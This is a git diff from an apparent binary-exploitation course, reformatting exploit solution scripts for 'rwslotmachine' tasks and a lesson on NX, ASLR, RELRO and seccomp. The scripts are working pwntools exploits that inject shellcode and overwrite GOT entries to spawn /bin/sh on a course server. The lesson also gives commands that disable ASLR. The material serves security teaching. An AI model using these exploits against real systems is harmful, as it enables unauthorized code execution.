p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + if SOLUTION == 1: - stack_leak = do_read(1) - stack_slots = stack_leak - 0x3e + stack_leak = do_read(1) + stack_slots = stack_leak - 0x3E else: - stack_leak = do_read(-7) - stack_slots = stack_leak + stack_leak = do_read(-7) + stack_slots = stack_leak shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80" shellcode_pieces = unpack_many(shellcode, 32) for i in range(len(shellcode_pieces)): - do_write(i, shellcode_pieces[i]) + do_write(i, shellcode_pieces[i]) do_write(-8, stack_slots) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py index 1021472..7c0719e 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/02-rwslotmachine2/sol/sol_got_overwrite.py @@ -3,33 +3,36 @@ local = True if local: - p = process('../src/rwslotmachine2') - binary = p.elf + p = process("../src/rwslotmachine2") + binary = p.elf else: - p = remote('141.85.224.117', 31345) - binary = ELF('../src/rwslotmachine2') + p = remote("141.85.224.117", 31345) + binary = ELF("../src/rwslotmachine2") libc = ELF("../src/libc.so.6") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + -slots_offset = binary.symbols['slots'] -strtoll_got_offset = binary.got['strtoll'] -puts_got_offset = binary.got['puts'] +slots_offset = binary.symbols["slots"] +strtoll_got_offset = binary.got["strtoll"] +puts_got_offset = binary.got["puts"] index_to_puts = (puts_got_offset - slots_offset) / 4 index_to_strtoll = (strtoll_got_offset - slots_offset) / 4 @@ -40,6 +43,6 @@ def do_write(idx, value): do_write(index_to_strtoll, system) -p.sendline('/bin/sh') +p.sendline("/bin/sh") p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py index a4a7d51..1ebdba4 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/03-rwslotmachine3/sol/sol_got_overwrite_2stage.py @@ -3,32 +3,35 @@ local = False if local: - p = remote('127.0.0.1', 31346) + p = remote("127.0.0.1", 31346) else: - p = remote('141.85.224.117', 31346) + p = remote("141.85.224.117", 31346) libc = ELF("../src/libc.so.6") -binary = ELF('../src/rwslotmachine3') +binary = ELF("../src/rwslotmachine3") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + -slots_offset = binary.symbols['slots'] -strtoll_got_offset = binary.got['strtoll'] -puts_got_offset = binary.got['puts'] +slots_offset = binary.symbols["slots"] +strtoll_got_offset = binary.got["strtoll"] +puts_got_offset = binary.got["puts"] index_to_puts = (puts_got_offset - slots_offset) / 4 index_to_strtoll = (strtoll_got_offset - slots_offset) / 4 @@ -37,16 +40,16 @@ def do_write(idx, value): libc_base = libc_leak - libc.symbols["puts"] system = libc_base + libc.symbols["system"] -p.sendline('3') +p.sendline("3") p.close() if local: - p = remote('127.0.0.1', 1234) + p = remote("127.0.0.1", 1234) else: - p = remote('141.85.224.117', 31346) + p = remote("141.85.224.117", 31346) do_write(index_to_strtoll, system) -p.sendline('/bin/sh') +p.sendline("/bin/sh") p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py index e2259bc..ee74820 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/04-rwslotmachine4/sol/sol_relro_bypass.py @@ -6,31 +6,34 @@ local = False if local: - p = process('../src/rwslotmachine4', env={'LD_LIBRARY_PATH' : '.'}) - binary = p.elf + p = process("../src/rwslotmachine4", env={"LD_LIBRARY_PATH": "."}) + binary = p.elf else: - p = remote('141.85.224.117', 31347) - binary = ELF('../src/rwslotmachine4') + p = remote("141.85.224.117", 31347) + binary = ELF("../src/rwslotmachine4") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + -slots_offset = binary.symbols['slots'] -puts_got_offset = binary.got['puts'] -readint_got_offset = binary.got['read_int'] +slots_offset = binary.symbols["slots"] +puts_got_offset = binary.got["puts"] +readint_got_offset = binary.got["read_int"] index_to_puts = (puts_got_offset - slots_offset) / 4 index_to_readint = (readint_got_offset - slots_offset) / 4 @@ -45,10 +48,10 @@ def do_write(idx, value): libint_base = libint_leak - libint.symbols["read_int"] # overwrite strtoll in the GOT of libint -libint_strtoll_got_offset = libint.got['strtoll'] +libint_strtoll_got_offset = libint.got["strtoll"] index_to_libint_strtoll = (libint_base + libint_strtoll_got_offset - slots_offset) / 4 do_write(index_to_libint_strtoll, system) -p.sendline('/bin/sh') +p.sendline("/bin/sh") p.interactive() diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py index e50b60c..40f2e69 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/05-rwslotmachine5/sol/sol_seccomp.py @@ -3,30 +3,34 @@ local = False if local: - p = process('../src/rwslotmachine5') + p = process("../src/rwslotmachine5") else: - p = remote('141.85.224.117', 31348) + p = remote("141.85.224.117", 31348) + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + stack_leak = do_read(1) -stack_slots = stack_leak - 0x3e +stack_slots = stack_leak - 0x3E -shellcode = asm(''' +shellcode = asm( + """ xor ecx, ecx xor eax, eax push 0x6761 @@ -49,12 +53,13 @@ def do_write(idx, value): int 0x80 mov al, 252 int 0x80 -''') +""" +) shellcode_pieces = unpack_many(shellcode, 32) for i in range(len(shellcode_pieces)): - do_write(i, shellcode_pieces[i]) + do_write(i, shellcode_pieces[i]) do_write(-8, stack_slots) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py index 4a3dad5..47eb7d4 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/activities/common/skel.py @@ -1,23 +1,26 @@ from pwn import * # TODO update binary name with task number -p = process('./rwslotmachineX') +p = process("./rwslotmachineX") + def do_read(idx): - p.recvuntil('>') - p.sendline('1') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil(']: ') - return int(p.recvuntil('\n')[:-1], 16) + p.recvuntil(">") + p.sendline("1") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("]: ") + return int(p.recvuntil("\n")[:-1], 16) + def do_write(idx, value): - p.recvuntil('>') - p.sendline('2') - p.recvuntil('index:') - p.sendline(str(idx)) - p.recvuntil('value:') - p.sendline(hex(value)) + p.recvuntil(">") + p.sendline("2") + p.recvuntil("index:") + p.sendline(str(idx)) + p.recvuntil("value:") + p.sendline(hex(value)) + gdb.attach(p) diff --git a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md index 70babf6..12ff211 100644 --- a/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md +++ b/chapters/mitigations-and-defensive-strategies/defense-mechanisms/reading/README.md @@ -1,27 +1,28 @@ ---- -linkTitle: Defense Mechanisms -type: docs -weight: 10 ---- - # Defense Mechanisms ## Introduction -The previous sessions ([Shellcodes](../shellcodes/) and [Shellcodes Advanced](../shellcodes-advanced/)) presented an exploitation scenario that is based on the assumption that machine instructions can be executed from **any** memory segment belonging to the process. As you can recall from the [Executable File Formats](../executable-file-formats/) session, different sections of an ELF binary are grouped into segments which are loaded into memory when the binary is being executed. This mechanism (and some hardware support) enables 2 important protection mechanisms that will be presented in this session: +The previous sessions ([Shellcodes](../../../exploitation-techniques/shellcodes/reading) and [Shellcodes Advanced](../../../exploitation-techniques/shellcodes-advanced/reading)) presented an exploitation scenario that is based on the assumption that machine instructions can be executed from **any** memory segment belonging to the process. +As you can recall from the [Executable File Formats](../../../binary-analysis/executables-and-processes/reading) session, different sections of an ELF binary are grouped into segments which are loaded into memory when the binary is being executed. +This mechanism (and some hardware support) enables 2 important protection mechanisms that will be presented in this session: -* Executable Space Protection: only certain parts of the address space exhibit the code execution right; -* Address Space Layout Randomization (ASLR): certain parts of the address space get mapped at random locations. +- Executable Space Protection: only certain parts of the address space exhibit the code execution right; +- Address Space Layout Randomization (ASLR): certain parts of the address space get mapped at random locations. -In the [Return Oriented Programming](../return-oriented-prgramming) session we discussed how the **PLT**/**GOT** work in relation to resolving addresses of functions from dynamically liked libraries. We also learned how to abuse this process and trigger arbitrary code execution by **corrupting GOT entries**. We will take this exploit primitive to the next level and explore how it can be used when additional defense mechanisms are in use. +In the [Return Oriented Programming](../../../exploitation-techniques/return-oriented-programming/reading) session we discussed how the **PLT**/**GOT** work in relation to resolving addresses of functions from dynamically liked libraries. +We also learned how to abuse this process and trigger arbitrary code execution by **corrupting GOT entries**. +We will take this exploit primitive to the next level and explore how it can be used when additional defense mechanisms are in use. Next, we will introduce the **RELRO** mitigation, which is designed to preclude the overwriting of relocation sections such as the GOT. Another defense mechanism we will discuss is **seccomp**, which enables applications to enforce restrictions on the system calls performed in the process and child processes, thereby creating a sandbox. -Besides presenting these mechanisms, we are also going to take a quick look at how can we bypass them. Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. +Besides presenting these mechanisms, we are also going to take a quick look at how can we bypass them. +Since these protections are ubiquitous at this time, you will have to work around them almost every time you build a binary exploit. -**IMPORTANT:** The tasks today are designed for 32 bit executables. Make sure you compile with the `-m32` flag for `gcc`. The binaries in the tasks archive are already compiled as such. +**Important:** The tasks today are designed for 32 bit executables. +Make sure you compile with the `-m32` flag for `gcc`. +The binaries in the tasks archive are already compiled as such. ## Tutorials @@ -31,11 +32,15 @@ The tutorials will showcase the tools used to inspect the defense mechanisms. The `checksec` command-line tool is a wrapper over the functionality implemented in pwntools' `pwnlib.elf.elf` module. -To get it to work in the Kali VM, you have to update pwntools to the latest version using `pip3 install -U pwntools`. +To get it to work in the Kali VM, you have to update pwntools to the latest version using: + +```console +pip3 install -U pwntools +``` We will use this tool throughout the session to identify which defense mechanisms are enabled for a certain binary: -``` +```console root@kali:~/demo/nx# checksec ./no_nx [*] '/root/demo/nx/no_nx' Arch: i386-32-little @@ -48,40 +53,64 @@ root@kali:~/demo/nx# checksec ./no_nx ### Executable Space Protection -The `executable space protection` is an instance of the `principle of least privilege`, which is applied in many security sensitive domains. In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. A memory region (i.e. page) can have the following protection levels: **READ**, **WRITE** and **EXECUTE**. The executable space protection mechanism mandates that writable regions should not be executable at the same time. This prevents code injection. +The `executable space protection` is an instance of the `principle of least privilege`, which is applied in many security sensitive domains. +In this case, the executable space protection is used to limit the types of memory access that a process is allowed to make during execution. +A memory region (i.e. page) can have the following protection levels: **READ**, **WRITE** and **EXECUTE**. +The executable space protection mechanism mandates that writable regions should not be executable at the same time. +This prevents code injection. The mechanism can be (and was) implemented in many different ways, the most common in Linux being: -* **NX bit**: This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. This is the current implementation in 64-bit processors where page table entries are 8-bytes wide. -* **Physical Address Extension (PAE)**: Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds a NX bit in its page table entries. -* **Emulation**: The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit ([PaX PAGEEXEC](https://en.wikipedia.org/wiki/PaX#PAGEEXEC)), or by using the segmentation mechanism and splitting the address space in half ([PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC)). +- **`NX` bit**: This is the easiest method, and involves an extra bit added to each page table entry that specifies if the memory page should be executable or not. +This is the current implementation in 64-bit processors where page table entries are 8-bytes wide. +- **Physical Address Extension (`PAE`)**: Besides the main feature that allows access to more than 4GB of memory, the PAE extension for 32-bit processor also adds a NX bit in its page table entries. +- **Emulation**: The NX bit can be emulated on older (i.e., non-PAE) 32-bit processors by overloading the Supervisor bit ([`PaX PAGEEXEC`](https://en.wikipedia.org/wiki/PaX#PAGEEXEC)), or by using the segmentation mechanism and splitting the address space in half ([PaX SEGMEXEC](https://en.wikipedia.org/wiki/PaX#SEGMEXEC)). -This security feature gets in the way of **just-in-time (JIT)** compilers, which need to produce and write code at runtime, and that is later executed. Since a JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode. +This security feature gets in the way of **just-in-time (`JIT`)** compilers, which need to produce and write code at runtime, and that is later executed. +Since a JIT compiler cannot run in this kind of secured environment, an application using it is vulnerable to attacks known as **JIT spraying**. +The idea was first presented by Dion Blazakis, and is, briefly, a way to force the JIT compiler to produce shellcode. -* Slides: [Black Hat & DEF CON 2010](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); -* Paper: [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). +- Slides: [Black Hat & DEF CON 2010](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf); +- Paper: [Interpreter Exploitation. Pointer Inference and JIT Spraying](http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf). -There are of course other implementations in different hardening-oriented projects such as: OpenBSD [W^X](https://marc.info/?l=openbsd-misc&m=105056000801065), Red Hat [Exec Shield](https://marc.info/?l=openbsd-misc&m=105056000801065), PaX (which is now part of [grsecurity](https://grsecurity.net/)), Windows Data Execution Prevention ([DEP](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention)). +There are of course other implementations in different hardening-oriented projects such as: OpenBSD [`W^X`](https://isopenbsdsecu.re/mitigations/wx/), Red Hat [`Exec Shield`](https://www.redhat.com/en/blog/security-technologies-execshield), `PaX` (which is now part of [`grsecurity`](https://grsecurity.net/)), Windows Data Execution Prevention ([`DEP`](https://docs.microsoft.com/en-us/windows/win32/memory/data-execution-prevention)). ### Memory Segments Permissions Walkthrough -The Linux kernel provides support for managing memory protections using the `mmap()` and `mprotect()` syscalls. Simply put, what they do is: +The Linux kernel provides support for managing memory protections using the `mmap()` and `mprotect()` syscalls. +Simply put, what they do is: -* `mmap()`: requests the OS to create a mapping (allocate space) inside the address space of the calling process. See [this answer](https://stackoverflow.com/questions/3642021/what-does-mmap-do); -* `mprotect()`: requests the OS to set permissions over a memory region (e.g. `PROT_READ`, `PROT_WRITE`, `PROT_EXEC` and others). +- `mmap()`: requests the OS to create a mapping (allocate space) inside the address space of the calling process. + See [this answer](https://stackoverflow.com/questions/3642021/what-does-mmap-do); +- `mprotect()`: requests the OS to set permissions over a memory region (e.g. `PROT_READ`, `PROT_WRITE`, `PROT_EXEC` and others). -These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. Of course, the same functions can also be used during execution. +These syscalls are used by the loader to set protection levels for each segment it loads when running a binary. +Of course, the same functions can also be used during execution. -PaX has a protection option that restricts the use of `mprotect()` and `mmap()` to avoid resetting the permissions during execution. See [MPROTECT](https://pax.grsecurity.net/docs/mprotect.txt). Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. You have to compile your own kernel if you want to try them out. +PaX has a protection option that restricts the use of `mprotect()` and `mmap()` to avoid resetting the permissions during execution. +See [MPROTECT](https://pax.grsecurity.net/docs/mprotect.txt). +Note that grsecurity/PaX are patches to the kernel, and are not available in normal distributions. +You have to compile your own kernel if you want to try them out. -Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. We can do this in two ways, as told below. +Let's start by deactivating ASLR, which is going to be discussed in the following section of this tutorial, and only focus on the NX protection. +We can do this in two ways, as told below. -* To disable ASLR system-wide we use (root access is required): `sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space'`; -* To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell), we use (root access is not required): `setarch $(uname -m) -R /bin/bash`. +- To disable ASLR system-wide we use (root access is required): -After disabling ASLR, let's compile an extremely simple C application. Save the following code as `hello.c`: + ```console + sudo bash -c 'echo 0 > /proc/sys/kernel/randomize_va_space' + ``` -``` +- To create a shell with ASLR disabled (ASLR will also be disabled for future processes spawned from that shell), we use (root access is not required): + + ```console + setarch $(uname -m) -R /bin/bash + ``` + +After disabling ASLR, let's compile an extremely simple C application. +Save the following code as `hello.c`: + +```c int main() { while (1); } @@ -89,11 +118,19 @@ int main() { Make sure you have both `build-essential` and `gcc-multilib` packages installed before going further (run `sudo apt install build-essential gcc-multilib` on Debian-based systems). -Compile the `hello.c` code using `CFLAGS='-m32 -O0' make hello`. The result should be a `hello` binary. - -As presented in the `Static Analysis` session, the ELF format contains flags for each segment that specify what permissions should be granted. You can use `readelf -l hello` to dump all program headers for this binary. The result should be similar to: +Compile the `hello.c` code using: +```console +CFLAGS='-m32 -O0' make hello ``` + +The result should be a `hello` binary. + +As presented in the ["Static Analysis" session](../../../binary-analysis/static-analysis/reading), the ELF format contains flags for each segment that specify what permissions should be granted. +You can use `readelf -l hello` to dump all program headers for this binary. +The result should be similar to: + +```text Program Headers: Type Offset VirtAddr PhysAddr FileSiz MemSiz Flg Align PHDR 0x000034 0x08048034 0x08048034 0x00120 0x00120 R E 0x4 @@ -109,28 +146,31 @@ Program Headers: Section to Segment mapping: Segment Sections... - 00 - 01 .interp - 02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame - 03 .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss - 04 .dynamic - 05 .note.ABI-tag .note.gnu.build-id - 06 .eh_frame_hdr - 07 + 00 + 01 .interp + 02 .interp .note.ABI-tag .note.gnu.build-id .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rel.dyn .rel.plt .init .plt .text .fini .rodata .eh_frame_hdr .eh_frame + 03 .init_array .fini_array .jcr .dynamic .got .got.plt .data .bss + 04 .dynamic + 05 .note.ABI-tag .note.gnu.build-id + 06 .eh_frame_hdr + 07 08 .init_array .fini_array .jcr .dynamic .got ``` -Check the `Flg` column. For example, the first `LOAD` segment contains `.text` and is marked `R E`, while the `GNU_STACK` segment is marked `RW `. +Check the `Flg` column. +For example, the first `LOAD` segment contains `.text` and is marked `R E`, while the `GNU_STACK` segment is marked `RW`. -Next we are interested in seeing calls to `mmap2()` and `mprotect()` made by the loader. We are going to use the `strace` tool for this, and directly execute the loader. You can check the path to the loader on your system using `ldd hello`. +Next we are interested in seeing calls to `mmap2()` and `mprotect()` made by the loader. +We are going to use the `strace` tool for this, and directly execute the loader. +You can check the path to the loader on your system using `ldd hello`. -``` -$ strace -e mmap2,mprotect /lib/ld-linux.so.2 ./hello +```console +strace -e mmap2,mprotect /lib/ld-linux.so.2 ./hello ``` The output should be similar to: -``` +```text [ Process PID=11198 runs in 32 bit mode. ] mmap2(0x8048000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8048000 mmap2(0x8049000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = 0x8049000 @@ -146,15 +186,20 @@ mprotect(0x8049000, 4096, PROT_READ) = 0 mprotect(0x56575000, 4096, PROT_READ) = 0 ``` -We can observe a `PROT_READ|PROT_EXEC` mapping at address `0x8048000`, followed by a `PROT_READ|PROT_WRITE` at address `0x8049000` that is later changed to `PROT_READ` for the first half (4096 bytes). The later allocation is the data segment, that should be writable. We can also see a bunch of allocations for segments belonging to dynamic libraries. +We can observe a `PROT_READ|PROT_EXEC` mapping at address `0x8048000`, followed by a `PROT_READ|PROT_WRITE` at address `0x8049000` that is later changed to `PROT_READ` for the first half (4096 bytes). +The later allocation is the data segment, that should be writable. +We can also see a bunch of allocations for segments belonging to dynamic libraries. -Note that the **stack** is not explicitly allocated by the loader. The kernel will keep increasing it each time a page fault is triggered without calling `mmap`. Also, the **heap** will be extended on-demand as the application requires it. +Note that the **stack** is not explicitly allocated by the loader. +The kernel will keep increasing it each time a page fault is triggered without calling `mmap`. +Also, the **heap** will be extended on-demand as the application requires it. We can dump all memory mappings of the running process as follows: -``` -$ ps u | grep /lib/ld-linux.so.2 +```console +$ ps u | grep /lib/ld-linux.so.2 ... # get the PID of the loader process from this output, let's assume it is 11198 + $ cat /proc/11198/maps ``` @@ -162,19 +207,19 @@ Make sure to use the PID of the loader process, and not the `strace` process. The output of the last `cat` command should be similar to: -``` +```text 08048000-08049000 r-xp 00000000 00:22 5769082 /home/sss-user/sss-binary/sessions/defense-mechanisms/activities/hello 08049000-0804a000 r--p 00000000 00:22 5769082 /home/sss-user/sss-binary/sessions/defense-mechanisms/activities/hello 0804a000-0804b000 rw-p 00001000 00:22 5769082 /home/sss-user/sss-binary/sessions/defense-mechanisms/activities/hello 56555000-56575000 r-xp 00000000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so 56575000-56576000 r--p 0001f000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so 56576000-56577000 rw-p 00020000 08:05 827365 /lib/i386-linux-gnu/ld-2.19.so -f7e23000-f7e24000 rw-p 00000000 00:00 0 +f7e23000-f7e24000 rw-p 00000000 00:00 0 f7e24000-f7fcd000 r-xp 00000000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fcd000-f7fcf000 r--p 001a9000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so f7fcf000-f7fd0000 rw-p 001ab000 08:05 823395 /lib/i386-linux-gnu/libc-2.19.so -f7fd0000-f7fd3000 rw-p 00000000 00:00 0 -f7ffa000-f7ffd000 rw-p 00000000 00:00 0 +f7fd0000-f7fd3000 rw-p 00000000 00:00 0 +f7ffa000-f7ffd000 rw-p 00000000 00:00 0 f7ffd000-f7ffe000 r-xp 00000000 00:00 0 [vdso] fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] ``` @@ -183,35 +228,51 @@ fffdd000-ffffe000 rw-p 00000000 00:00 0 [stack] Below are a few methods of exploiting a binary that has **NX** enabled: -* **ret-to-plt/libc**. You can return to the `.plt` section and call library function already linked. You can also call other library functions based on their known offsets. The latter approach assumes no ASLR (see next section), or the possibility of an information leak. -* **mprotect()**. If the application is using `mprotect()` you can easily call it to modify the permissions and include `PROT_EXEC` for the stack. You can also call this in a `ret-to-libc` attack. You can also `mmap` a completely new memory region and dump the shellcode there. -* **Return Oriented Programming (ROP)**. This is a generalization of the `ret-to-*` approach that makes use of existing code to execute almost anything. As this is probably one of the most common types of attacks, it will be discussed in depth in a future section. +- **ret-to-plt/libc**: + You can return to the `.plt` section and call library function already linked. + You can also call other library functions based on their known offsets. + The latter approach assumes no ASLR (see next section), or the possibility of an information leak. +- **mprotect()**: + If the application is using `mprotect()` you can easily call it to modify the permissions and include `PROT_EXEC` for the stack. + You can also call this in a `ret-to-libc` attack. + You can also `mmap` a completely new memory region and dump the shellcode there. +- **Return Oriented Programming (ROP)**: + This is a generalization of the `ret-to-*` approach that makes use of existing code to execute almost anything. + As this is probably one of the most common types of attacks, it will be discussed in depth in a future section. ### Address Space Layout Randomization -**Address Space Layout Randomization (ASLR)** is a security feature that maps different memory regions of an executable at random addresses. This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. The code section can also be randomly mapped for [PIE](https://en.wikipedia.org/wiki/Position-independent_code#PIE) binaries. +**Address Space Layout Randomization (ASLR)** is a security feature that maps different memory regions of an executable at random addresses. +This prevents buffer overflow-based attacks that rely on known addresses such as the stack (for calling into shellcode), or dynamically linked libraries (for calling functions that were not already linked with the target binary). +Usually, the sections that are randomly mapped are: the stack, the heap, the VDSO page, and the dynamic libraries. +The code section can also be randomly mapped for [PIE](https://en.wikipedia.org/wiki/Position-independent_code#PIE) binaries. -Linux allows 3 options for its ASLR implementation that can be configured using the `/proc/sys/kernel/randomize_va_space` file. Writing **0**, **1** or **2** to this will results in the following behaviors: +Linux allows 3 options for its ASLR implementation that can be configured using the `/proc/sys/kernel/randomize_va_space` file. +Writing **0**, **1** or **2** to this will results in the following behaviors: -* **0**: deactivated; -* **1**: random stack, vdso, libraries; heap is after code section; random code section (only for PIE-linked binaries); -* **2**: random heap too. +- **0**: deactivated; +- **1**: random stack, vdso, libraries; + heap is after code section; + random code section (only for PIE-linked binaries); +- **2**: random heap too. Make sure you reactivate ASLR after the previous section of the tutorial, by one of the two options below. If you disabled ASLR system-wide, re-enable it using (root access is required): -``` -$ sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space' +```console +sudo bash -c 'echo 2 > /proc/sys/kernel/randomize_va_space' ``` If you disabled ASLR at shell level, simply **close the shell** such as issuing the `Ctrl+d` keyboard shortcut. We can easily demonstrate the effects of ASLR on shared libraries by running `ldd` multiple times in a row on a binary such as `/bin/ls`. -In GDB, ASLR is disabled by default in order to reduce the non-determinism and make debugging easier. However, when developing exploits we will sometimes want to test them in conjunction with ASLR. To enable ASLR in GDB, use the following command: +In GDB, ASLR is disabled by default in order to reduce the non-determinism and make debugging easier. +However, when developing exploits we will sometimes want to test them in conjunction with ASLR. +To enable ASLR in GDB, use the following command: -``` +```text pwndbg> set disable-randomization off ``` @@ -219,53 +280,79 @@ pwndbg> set disable-randomization off Below are a few methods of exploiting a binary that has **ASLR** enabled: -* **Bruteforce**. If you are able to inject payloads multiple times without crashing the application, you can bruteforce the address you are interested in (e.g., a target in libc). Otherwise, you can just run the exploit multiple times. Another thing to keep in mind is that, as addresses are randomized at load-time, child processes spawned with fork inherit the memory layout of the parent. Take the following scenario: we interact with a vulnerable sever that handles connections by forking to another process. We manage to obtain a leak from a child process but we are not able to create an exploit chain that leads to arbitrary code execution. However, we may still be able to use this leak in another connection, since the new process will have the same address space as the previous. -* **NOP sled**. In the case of shellcodes, a longer NOP sled will maximize the chances of jumping inside it and 